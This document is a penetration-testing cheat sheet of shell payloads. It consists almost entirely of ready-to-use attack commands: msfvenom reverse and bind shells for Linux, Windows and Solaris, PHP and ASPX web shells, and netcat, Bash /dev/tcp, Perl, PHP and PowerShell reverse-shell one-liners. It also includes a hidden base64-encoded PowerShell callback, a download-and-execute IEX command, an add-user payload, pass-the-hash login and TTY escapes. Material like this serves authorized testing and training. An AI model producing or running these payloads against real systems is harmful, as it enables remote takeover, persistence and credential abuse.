Shells

Web Shells

Locate and upload appropriate shells from - /user/share/webshells

---

Reverse Shells

Refer to https://www.revshells.com/

---

Reverse Shells (MSFvenom)

NOTE:

• shell/reverse_tcp = staged payload

• shell_reverse_tcp = unstaged payload

• staged payload requires meterpreter listener

Linux

Reverse Shell

• 32-bit Systems

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x86.elf

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x86.elf

• 64-bit Systems

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x64.elf

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf > shell-x64.elf

Bind Shell

• 32-bit Systems

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

msfvenom -p linux/x86/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

msfvenom -p linux/x86/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

• 64-bit Systems

msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

msfvenom -p linux/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

msfvenom -p linux/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f elf > bind.elf

Windows

Reverse Shell

• 32-bit Systems

msfvenom -p windows/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x86.exe

msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x86.exe

• 64-bit Systems

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x64.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f exe > shell-x64.exe

Bind Shell

• 32-bit Systems

msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

msfvenom -p windows/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

msfvenom -p windows/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

msfvenom -p windows/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

• 64-bit Systems

msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

msfvenom -p windows/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

msfvenom -p windows/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f exe > bind.exe

Extras

• Run command via executable file

msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<Powershell | CMD Command>" -f exe > payload.exe

EXAMPLE:

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell "IEX(New-Object Net.webClient).downloadString('http:///')"" -f exe > payload.exe

• Create User via executable file

msfvenom -p windows/adduser USER=<Username> PASS=<Password> -f exe > adduser.exe

SunOS (Solaris)

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

---

Web-based Payloads

PHP

Web Shell

<?php system($_GET['cmd']); ?>

<?php system($_REQUEST['cmd']); ?>

Reverse Shell

<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP[X]

Web Shell

Get from the following

• /usr/share/webshells/aspx/cmdasp.aspx

• /usr/share/webshells/aspx/shell.aspx

NOTE: Remember to modify variables, string host and int port in shell.aspx

Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f asp > reverse.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f aspx > reverse.aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw> reverse.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>

---

Script Language Payloads

Evil-WinRM

NOTE:

• Verify usability with: crackmapexec winrm <Target IP>

• Look for port 5985 in nmap scans

evil-winrm -i <Target IP Address> -u <Username> -p <Password>

evil-winrm -i <Target IP Address> -u <Username -H <NTLM Hash>

Powercat.ps1

powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')

powercat -c <Kali IP Address> -p <Kali Port> -e powershell

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py

PHP

<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>

php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Bash

NOTE: Create a .sh file and paste the following

#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"

Netcat

• Linux

nc -nv <Kali IP Address> <Kali Port> -e /bin/bash

nc -nv <Kali IP Address> <Kali Port> -e /bin/sh

nc -nv <Kali IP Address> <Kali Port> -c /bin/bash

nc -nv <Kali IP Address> <Kali Port> -c /bin/sh

• Windows

nc64.exe <Kali IP Address> <Kali Port> -e cmd

nc64.exe <Kali IP Address> <Kali Port> -e powershell

nc64.exe <Kali IP Address> <Kali Port> -t -e cmd

nc64.exe <Kali IP Address> <Kali Port> -t -e powershell

PowerShell

Do the following in Kali's pwsh

$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

Create the following python script and run it

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

TTY Shell

NOTE: Sometime we get a reverse shell and it may not be fully functional. The following commands allow us to spawn proper shell.

Python

python -c 'import pty; pty.spawn("/bin/sh")'

python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color

Bash

echo os.system('/bin/bash')

/bin/sh -i

/bin/bash -i

script -qc /bin/bash /dev/null

Perl

perl -e 'exec "/bin/sh";'

exec "/bin/sh";

Ruby

exec "/bin/sh"

Lua

os.execute('/bin/sh')

IRB

exec "/bin/sh"

Vi

:!bash

:set shell=/bin/bash:shell

Nmap:

!sh